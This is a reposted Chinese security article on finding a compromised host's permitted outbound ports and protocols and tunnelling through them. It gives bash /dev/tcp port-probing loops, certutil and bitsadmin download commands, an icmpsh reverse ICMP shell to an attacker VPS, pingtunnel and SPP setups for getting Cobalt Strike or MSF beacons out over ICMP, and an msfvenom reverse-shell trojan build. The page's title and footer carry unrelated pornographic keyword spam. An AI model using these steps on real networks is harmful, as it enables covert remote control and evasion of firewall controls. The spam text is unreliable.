色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

出網探測是什么

jf_vLt34KHi ? 來源:Tide安全團隊 ? 作者: komorebi ? 2022-10-20 14:26 ? 次閱讀

出網探測

出網探測就是要探測出網協議,出站ip和出站端口。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站協議。

目標禁止出站ip

如果目標主機設置了嚴格的策略,防火墻只允許目標內網機器主動連接公網指定的ip。這樣的話,沒法反彈shell。(因為白名單ip沒有辦法拿到權限)。

禁止出站端口

Linux系統使用Linux系統自帶命令探測出網端口。( 探測目標機器可以訪問baidu.com對應ip的端口)

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i***********************open************************"||echo"$iclosed";done
8e2b74f4-4f8f-11ed-a3b6-dac502259ad0.png

webshell不好回顯結果,將結果寫入文件中

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt
8e4e41b4-4f8f-11ed-a3b6-dac502259ad0.png

探測常見端口

foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done
foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt

攻擊端的端口請求記錄

從目標發起的端口訪問請求,攻擊端必須得配合記錄,否則即便找到有效的出站端口,我們也無法獲悉。思路一,單個逐次監聽端口。對于少量端口的探測,攻擊端很容易記錄。比如,要驗證 windows 目標的 8088 端口是否為出站端口,先在攻擊端用 nc -n -v -lp 8088 監聽 8088,指定 -v 選項觀察實時訪問記錄,再在目標上用 telnet 192.168.56.8 8088 連接攻擊端的 8088 端口,最后在攻擊端查看端口訪問記錄,若有則該端口是有效出站端口,若無則重復以上步驟繼續驗證其他端口。

二,批量捆綁監聽端口。試想一下,如果能夠把攻擊端的多個端口流量轉發至單個匯聚端口,就只需監聽單個匯聚端口,目標上發起多個端口探測,只要在攻擊端轉發的多個端口的范圍內,那么,一旦找到有效出站端口,攻擊端的匯聚端口一定有訪問記錄。說到端口轉發,系統自帶的 ssh、iptables,三方的 frp、nps,這些工具都能高效實現,于是,我從這四個工具中找尋具備端口捆綁能力的那位 攻擊端這邊需要有?標機訪問的記錄,才能更好的判斷?標機器是否訪問了我們。只要?標機器訪問到 了我們VPS的任意?個端?,我們這邊都能有記錄。//將所有端?的流量都綁定到34444端?

iptables-APREROUTING-tnat-ptcp--dport1:65535-jREDIRECT--to-port34444

//查看nat表的規則

iptables-tnat-nvL

//清除nat表所有規則

iptables-tnat-F

//備份iptables規則

iptables-save>/tmp/firewall.rules

//恢復iptables規則

iptables-restore

配置防?墻規則,禁?訪問遠程機器的1-34566和34566-65535端?,也就是說只允許訪問34567端?然后我們這邊監聽34444端?,在?標機器端?探測

8ea18c5c-4f8f-11ed-a3b6-dac502259ad0.png

禁止出站協議

對于禁止出站協議的情況,需要探測目標機器允許哪些協議出網。

探測ICMP協議服務端

監聽ICMP流量:

tcpdumpicmp

客戶端ping VPS地址,查看服務端能否收到請求VPS監聽,然后ping我們vps查看能否收到監聽來判斷ICMP 協議是否出?。也可以直接ping?個地址,看是否 有ttl值。

探測DNS協議

Windows:

nslookup、ping

Linux:

nslookup、dig、ping

通過判斷能否將域名解析為ip,判斷DNS協議是否出?。也可以將域名換成dnslog的域名,再看dnslog能否收到請求。

探測HTTP協議

Linux:可以使用curl命令

curlhttp://192.168.10.13

Windows系統可以使用如下的命令

certutil-urlcache-split-fhttp://www.baidu.com
bitsadmin/transfertesthttp://192.168.10.13/1c:1
powershelliwr-Urihttp://www.baidu.com-OutFile1-UseBasicParsing

只有ICMP協議出網

目標只有icmp協議能出?的話,則只有考慮使?icmp協議來搭建隧道。利?icmp協議通信的?具有很多icmpsh、reverse-icmp-shell、PingTunnel、IcmpTunnel都可以。常?的ping命令就是利?的ICMP協議。

icmpsh(2016+kali2017)

icmpsh 是一個簡單的反向 ICMP shell,帶有一個 win32 從站和一個 C、Perl 或 Python 中的兼容主站。與其他類似的開源工具相比,它的主要優勢在于它不需要管理權限即可在目標機器上運行。使用ICMP進行命令控制(Icmpsh)適?場景:?標機器是Windows服務器 Linux服務器執行

#關閉icmp回復,如果要開啟icmp回復,該值設置為0
sysctl-wnet.ipv4.icmp_echo_ignore_all=1
#運?,第?個IP是VPS的eth0?卡IP(vps上ifconfig可以得到),第?個IP是?標機器出?的公?IP
python2icmpsh_m.py192.168.10.8192.168.10.7

目標機器的操作:

icmpsh.exe-t192.168.10.8
8eafaabc-4f8f-11ed-a3b6-dac502259ad0.png

可以看到已經反彈出一個shell

ICMP上線CS

有如下場景,我們拿到了內?的機器權限。但是機器對外均只有icmp協議出網,我們現在可以利?icmp封裝tcp協議,讓其上線cs。

使用SPP

平常演練常用的一些隧道工具像frp,nps在目標出網的情況下還是比較好用的。但是一旦遇到一些比較惡劣的環境,比如只有icmp可以出網的情況,那就需要使用其他的工具像pingtunnel,ptunnel等。SPP三個特點:、 支持icmp、kcp、quic 支持雙向的代理 可以自由進行內部外協議的組合

功能:支持的協議:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的類型:正向代理、反向代理、socks5正向代理、socks5反向代理 協議和類型可以自由組合 外部代理協議和內部轉發協議可以自由組合 支持shadowsock/s插件,spp-shadowsock/s-plugin,spp-shadowsock/s-plugin-android cs服務器端

./spp-typeserver-protoricmp-listen0.0.0.0

客戶端

spp-name"test"-typeproxy_client-server140.143.167.58-fromaddr:8082-toaddr:8081-proxyprototcp-protoricmp
8ee3edcc-4f8f-11ed-a3b6-dac502259ad0.png

pingtunnel上線MSF&CS

1、pingtunnel下載鏈接

https://github.com/esrrhs/pingtunnel/releases

注意,在客戶端中運行一定要加noprint nolog兩個參數,否則會生成大量的日志文件;ICMP為網絡層協議,應用層防火墻無法識別,且請求包當中的數據字段被加密 2 vps服務端開啟

##開啟服務器模式
./pingtunnel-typeserver

3、客戶端開啟上傳客戶端

##客戶端本地監聽9999端口,將監聽到的連接通過icmpserver發送到Linsten_ip:7777端口
pingtunnel.exe-typeclient-l127.0.0.1:9999-sicmpserver_ip-t82.157.64.237:7778-tcp1-noprint1-nolog1

4、MSF上線

msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=9999-fexe-oAAA.exe

5、cs上線 建立監聽127.0.0.1:9999和192.168.3.76:7777 對127的監聽生成木馬AAA.exe,傳到靶機運行

pingtunnel.exe-typeclient-l127.0.0.1:9999-s192.168.3.76-t192.168.3.76:7777-tcp1-noprint1-nolog1

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • Linux
    +關注

    關注

    87

    文章

    11292

    瀏覽量

    209333
  • WINDOWS
    +關注

    關注

    3

    文章

    3541

    瀏覽量

    88626
  • 端口
    +關注

    關注

    4

    文章

    963

    瀏覽量

    32052

原文標題:隧道與端口轉發

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    被動聲探測數據仿真系統的設計與實現

    被動聲探測數據仿真系統的設計與實現摘要以被動聲探測數據融合仿真測試評估系統的研究和開發為背景,討論了被動聲探測
    發表于 08-08 09:35

    電纜探測

    時會出現內部斷線外部完好,沒有儀器情況下是找不到斷線位置。我們研制《電纜斷線探測器》可探測各種大小型多芯低壓電纜, 地埋電纜。檢測位置準確,隔皮檢測,不損壞電纜。精度10毫米。備有樣品,以供觀看。如果需要請聯系。地址:河南省孟
    發表于 05-06 18:32

    地下金屬探測

    本帖最后由 eehome 于 2013-1-5 09:49 編輯 大俠們,誰有這方面的資料可以共享下,想研究一個能探測地下金屬的東西電子產品玩玩,我自己本身是做硬件電子開發的,不過不涉及這塊,大俠們,有資料記得分享下萬分感謝{:soso_e100:}
    發表于 10-24 15:20

    簡易照明線路探測

    設計 并制作 具有顯示器的 簡易 照明線路探測儀 ,能在厚度為 5mm 的五合板 正面探測 背面 2根照明 電纜 的位置, 電纜 的布線 如圖 1所示 。電纜一 端與 220V 交流電源插座相連
    發表于 09-04 09:34

    光子探測

    最高分辨率記錄弱信號時,無噪聲檢測器便顯示其最大的優勢。2、優異的點擴散函數采用混合像素技術和X射線直接轉換為電荷脈沖技術,PILATUS探測器的像素之間沒有信號傳播。這給于單個像素形成尖銳的點擴散函數
    發表于 03-03 19:12

    capture cis 表沒有反應

    昨天用capture cis 表時,怎么不出來,總是提示下面的警告,然后就沒反應了,檢查之后沒發現什么異常,最后搜素“.dsnwill be saved prior
    發表于 09-27 17:11

    電流探測

    示波器一般為輸入電壓而設計,但可運用電流探測線使示波器能測量電流.電流探測線有一對夾子,使探測線能圍繞被測電流流過的電路。當用電流探測線測量電流時,無需有電的連接,也無需切開電路。電流
    發表于 10-30 10:40

    超低空分布式多傳感器探測節點有什么優點?

    由于雷達探測存在盲區,低空與超低空飛行的入侵目標給雷達防御系統帶來困難與威脅。基于GPS技術、多傳感器技術、網絡技術及單片機技術設計一種分布式多傳感器探測節點,把遠程分布的多傳感器探測
    發表于 04-14 07:50

    調試網絡,是否可以使用以太或UART在外部探測這些網絡?

    嗨專家,我想在我的設計中調試一些。是否可以使用以太或UART在外部探測這些網絡。如果可能的話,你可以提供一些教程鏈接或一些可以讓我實現它的文檔。您的建議和指導將非常有幫助。謝謝
    發表于 05-21 07:35

    被動聲探測數據仿真系統的設計與實現

    被動聲探測數據仿真系統的設計與實現 以被動聲探測數據融合仿真測試評估系統的研究和開發為背景,討論了被動聲探測
    發表于 02-23 09:45 ?7次下載

    基于方位測量的地下管線探測系統設計與研究

    隨著現代信息化技術的發展,在當前的地下管線探測工作中,亟待應用信息化手段設計地下管線探測系統,實現對地下管線探測工作的信息化管理;對此本篇基于方位測量技術,從系統需求分析、系統結構、
    發表于 11-23 15:34 ?2次下載
    基于方位測量的地下管線<b class='flag-5'>探測</b>系統設計與研究

    天問一號探測器多重

    作為本輪火星探測競賽第二位場的選手,總重約5噸的“天問一號”作為世界領先探測器之一
    的頭像 發表于 07-23 14:50 ?1.4w次閱讀

    各種協議判斷主機是否

    允許哪些協議,執行命令時可結合Wireshark工具來查看它走的什么協議。這篇文章的內容基本摘自@Keefe 老哥博客中的 各種協議判斷目標是否 。 (1) ICMPping
    的頭像 發表于 10-16 14:19 ?4025次閱讀
    各種協議判斷主機是否<b class='flag-5'>出</b><b class='flag-5'>網</b>

    如何設計穩定的以太?留意這幾個設計要點!

    以太是大部分嵌入式產品必備的通信接口,如何設計穩定、可靠的以太電路呢?本文綜合數名行業硬件工程師經驗總結以下要點,希望能為讀者提供設計思路及解決問題的方法。
    的頭像 發表于 04-08 15:47 ?776次閱讀
    如何設計<b class='flag-5'>出</b>穩定的以太<b class='flag-5'>網</b>?留意這幾個設計要點!

    科學家研制一款新型柔性X射線探測

    英國科學家開發出一種有機半導體材料,并利用其研制一款新型柔性X射線探測器。這種探測器不僅“身段”更柔軟,可貼合需要掃描物體的形狀,從而提高患者篩查的準確性,降低腫瘤成像和放射性治療的風險,而且成本
    的頭像 發表于 06-13 06:29 ?299次閱讀
    主站蜘蛛池模板: 精品无码一区二区三区中文字幕| 国产手机精品一区二区| 九九久久久| 午夜不卡av免费| 耻辱诊察室1一4集动漫在线观看| 狼人无码伊人AV啪啪| 无人区在线日本高清免费| av天堂网2014在线| 就去色电影| 一本色道久久88加勒比—综合| 国产成人久视频免费| 飘雪在线观看免费完整版| 2019一級特黃色毛片免費看| 精品国产乱码久久久久久下载 | 国产无遮挡色视频免费观看性色| 秋霞伦理电影在线看 | 成人伦理影院| 国产精品久久久久一区二区三区 | 97国产在线观看| 久久亚洲精品专区蓝色区| 一区二区乱子伦在线播放| 国产中文字幕乱码一区| 亚洲AV噜噜狠狠网址蜜桃尤物| 各种肉黄浪荡故事集| 色男人的天堂久久综合| BT7086福利二区最新| 欧美中文字幕一区二区三区| 99热.com| 全球真实小U女视频合集| xxxxx中国明星18| 人妻互换免费中文字幕| 成人免费观看www视频| 入禽太深视频免费视频| 高hbl双性浪荡古代| 亚洲AV综合99一二三四区| 狠狠射首页| 2017欧美狠狠色| 人人干人人看| 国产传媒在线观看| 亚洲欧洲日本无在线码播放| 九色PORNY真实丨首页|